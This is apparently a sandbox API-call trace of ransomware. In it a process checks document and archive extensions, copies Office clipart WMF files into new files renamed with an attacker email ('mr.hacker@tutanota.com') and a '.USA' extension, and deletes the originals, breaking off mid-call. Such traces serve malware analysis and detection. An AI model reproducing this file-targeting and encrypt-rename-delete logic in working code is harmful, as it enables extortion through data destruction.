[0270.926] lstrlenW (lpString=".zip") returned 4 [0270.926] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.926] lstrlenW (lpString=".rar") returned 4 [0270.926] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.926] lstrlenW (lpString=".bz2") returned 4 [0270.926] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.926] lstrlenW (lpString=".7z") returned 3 [0270.926] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.926] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63 [0270.926] lstrlenW (lpString=".dbf") returned 4 [0270.926] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.926] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63 [0270.926] lstrlenW (lpString=".1cd") returned 4 [0270.926] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.926] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63 [0270.926] lstrlenW (lpString=".jpg") returned 4 [0270.926] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.926] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.927] lstrlenW (lpString="EN00319_.WMF") returned 12 [0270.927] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00319_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0270.927] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=2280) returned 1 [0270.927] CloseHandle (hObject=0x328) returned 1 [0270.927] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00319_.wmf")) returned 0x20 [0270.927] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00319_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.927] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00319_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0270.927] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.927] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.927] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00319_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0270.928] GetLastError () returned 0x0 [0270.928] ReadFile (in: hFile=0x328, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x8e8, lpOverlapped=0x0) returned 1 [0270.938] WriteFile (in: hFile=0x348, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x8f0, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x8f0, lpOverlapped=0x0) returned 1 [0270.939] ReadFile (in: hFile=0x328, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0270.939] WriteFile (in: hFile=0x348, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.939] SetEndOfFile (hFile=0x348) returned 1 [0270.941] CloseHandle (hObject=0x348) returned 1 [0270.941] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.941] SetEndOfFile (hFile=0x328) returned 1 [0270.943] CloseHandle (hObject=0x328) returned 1 [0270.943] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.975] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00319_.wmf")) returned 1 [0270.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63 [0270.981] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63 [0270.981] lstrlenW (lpString=".doc") returned 4 [0270.981] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.981] lstrlenW (lpString=".docx") returned 5 [0270.981] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.981] lstrlenW (lpString=".pdf") returned 4 [0270.981] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.981] lstrlenW (lpString=".xls") returned 4 [0270.981] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.981] lstrlenW (lpString=".xlsx") returned 5 [0270.981] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.981] lstrlenW (lpString=".ppt") returned 4 [0270.981] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.981] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63 [0270.981] lstrlenW (lpString=".zip") returned 4 [0270.981] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.981] lstrlenW (lpString=".rar") returned 4 [0270.981] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.981] lstrlenW (lpString=".bz2") returned 4 [0270.981] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.981] lstrlenW (lpString=".7z") returned 3 [0270.981] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.981] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63 [0270.981] lstrlenW (lpString=".dbf") returned 4 [0270.981] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.981] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63 [0270.981] lstrlenW (lpString=".1cd") returned 4 [0270.981] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63 [0270.982] lstrlenW (lpString=".jpg") returned 4 [0270.982] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63 [0270.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63 [0270.982] lstrlenW (lpString=".doc") returned 4 [0270.982] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.982] lstrlenW (lpString=".docx") returned 5 [0270.982] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.982] lstrlenW (lpString=".pdf") returned 4 [0270.982] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.982] lstrlenW (lpString=".xls") returned 4 [0270.982] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.982] lstrlenW (lpString=".xlsx") returned 5 [0270.982] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.982] lstrlenW (lpString=".ppt") returned 4 [0270.982] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63 [0270.982] lstrlenW (lpString=".zip") returned 4 [0270.982] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.982] lstrlenW (lpString=".rar") returned 4 [0270.982] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.982] lstrlenW (lpString=".bz2") returned 4 [0270.982] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.982] lstrlenW (lpString=".7z") returned 3 [0270.982] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63 [0270.982] lstrlenW (lpString=".dbf") returned 4 [0270.982] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.983] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63 [0270.983] lstrlenW (lpString=".1cd") returned 4 [0270.983] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.983] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63 [0270.983] lstrlenW (lpString=".jpg") returned 4 [0270.983] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.983] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.983] lstrlenW (lpString="EN00902_.WMF") returned 12 [0270.983] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00902_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0271.057] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=7944) returned 1 [0271.057] CloseHandle (hObject=0x348) returned 1 [0271.057] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00902_.wmf")) returned 0x20 [0271.057] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00902_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00902_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0271.057] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.057] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00902_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0271.066] GetLastError () returned 0x0 [0271.066] ReadFile (in: hFile=0x348, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x1f08, lpOverlapped=0x0) returned 1 [0271.068] WriteFile (in: hFile=0x328, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x1f10, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x1f10, lpOverlapped=0x0) returned 1 [0271.069] ReadFile (in: hFile=0x348, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.069] WriteFile (in: hFile=0x328, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.069] SetEndOfFile (hFile=0x328) returned 1 [0271.069] CloseHandle (hObject=0x328) returned 1 [0271.069] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.069] SetEndOfFile (hFile=0x348) returned 1 [0271.072] CloseHandle (hObject=0x348) returned 1 [0271.072] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.080] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00902_.wmf")) returned 1 [0271.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63 [0271.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63 [0271.080] lstrlenW (lpString=".doc") returned 4 [0271.080] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.080] lstrlenW (lpString=".docx") returned 5 [0271.080] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.080] lstrlenW (lpString=".pdf") returned 4 [0271.080] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.081] lstrlenW (lpString=".xls") returned 4 [0271.081] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.081] lstrlenW (lpString=".xlsx") returned 5 [0271.081] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.081] lstrlenW (lpString=".ppt") returned 4 [0271.081] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63 [0271.081] lstrlenW (lpString=".zip") returned 4 [0271.081] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.081] lstrlenW (lpString=".rar") returned 4 [0271.081] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.081] lstrlenW (lpString=".bz2") returned 4 [0271.081] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.081] lstrlenW (lpString=".7z") returned 3 [0271.081] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63 [0271.081] lstrlenW (lpString=".dbf") returned 4 [0271.081] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63 [0271.081] lstrlenW (lpString=".1cd") returned 4 [0271.081] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63 [0271.081] lstrlenW (lpString=".jpg") returned 4 [0271.081] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63 [0271.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63 [0271.081] lstrlenW (lpString=".doc") returned 4 [0271.081] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.082] lstrlenW (lpString=".docx") returned 5 [0271.082] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.082] lstrlenW (lpString=".pdf") returned 4 [0271.082] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.082] lstrlenW (lpString=".xls") returned 4 [0271.082] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.082] lstrlenW (lpString=".xlsx") returned 5 [0271.082] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.082] lstrlenW (lpString=".ppt") returned 4 [0271.082] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63 [0271.082] lstrlenW (lpString=".zip") returned 4 [0271.082] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.082] lstrlenW (lpString=".rar") returned 4 [0271.082] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.082] lstrlenW (lpString=".bz2") returned 4 [0271.082] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.082] lstrlenW (lpString=".7z") returned 3 [0271.082] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63 [0271.082] lstrlenW (lpString=".dbf") returned 4 [0271.082] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63 [0271.082] lstrlenW (lpString=".1cd") returned 4 [0271.082] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63 [0271.082] lstrlenW (lpString=".jpg") returned 4 [0271.082] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.083] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.083] lstrlenW (lpString="FD00096_.WMF") returned 12 [0271.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00096_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.083] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=37390) returned 1 [0271.083] CloseHandle (hObject=0x384) returned 1 [0271.083] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00096_.wmf")) returned 0x20 [0271.083] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00096_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00096_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.083] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.083] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00096_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0271.084] GetLastError () returned 0x0 [0271.084] ReadFile (in: hFile=0x384, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x920e, lpOverlapped=0x0) returned 1 [0271.092] WriteFile (in: hFile=0x3a4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x9210, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x9210, lpOverlapped=0x0) returned 1 [0271.093] ReadFile (in: hFile=0x384, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.093] WriteFile (in: hFile=0x3a4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.093] SetEndOfFile (hFile=0x3a4) returned 1 [0271.093] CloseHandle (hObject=0x3a4) returned 1 [0271.093] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.094] SetEndOfFile (hFile=0x384) returned 1 [0271.096] CloseHandle (hObject=0x384) returned 1 [0271.096] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.096] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00096_.wmf")) returned 1 [0271.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 63 [0271.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 63 [0271.096] lstrlenW (lpString=".doc") returned 4 [0271.096] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.096] lstrlenW (lpString=".docx") returned 5 [0271.097] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.097] lstrlenW (lpString=".pdf") returned 4 [0271.097] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.097] lstrlenW (lpString=".xls") returned 4 [0271.097] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.097] lstrlenW (lpString=".xlsx") returned 5 [0271.097] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.097] lstrlenW (lpString=".ppt") returned 4 [0271.097] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 63 [0271.097] lstrlenW (lpString=".zip") returned 4 [0271.097] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.097] lstrlenW (lpString=".rar") returned 4 [0271.097] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.097] lstrlenW (lpString=".bz2") returned 4 [0271.097] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.097] lstrlenW (lpString=".7z") returned 3 [0271.097] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 63 [0271.097] lstrlenW (lpString=".dbf") returned 4 [0271.097] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 63 [0271.097] lstrlenW (lpString=".1cd") returned 4 [0271.097] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 63 [0271.097] lstrlenW (lpString=".jpg") returned 4 [0271.097] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 63 [0271.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 63 [0271.098] lstrlenW (lpString=".doc") returned 4 [0271.098] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.098] lstrlenW (lpString=".docx") returned 5 [0271.098] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.098] lstrlenW (lpString=".pdf") returned 4 [0271.098] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.098] lstrlenW (lpString=".xls") returned 4 [0271.098] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.098] lstrlenW (lpString=".xlsx") returned 5 [0271.098] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.098] lstrlenW (lpString=".ppt") returned 4 [0271.098] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 63 [0271.098] lstrlenW (lpString=".zip") returned 4 [0271.098] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.098] lstrlenW (lpString=".rar") returned 4 [0271.098] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.098] lstrlenW (lpString=".bz2") returned 4 [0271.098] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.261] lstrlenW (lpString=".7z") returned 3 [0271.262] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 63 [0271.262] lstrlenW (lpString=".dbf") returned 4 [0271.262] lstrcmpiW (lpString1=".dbf", 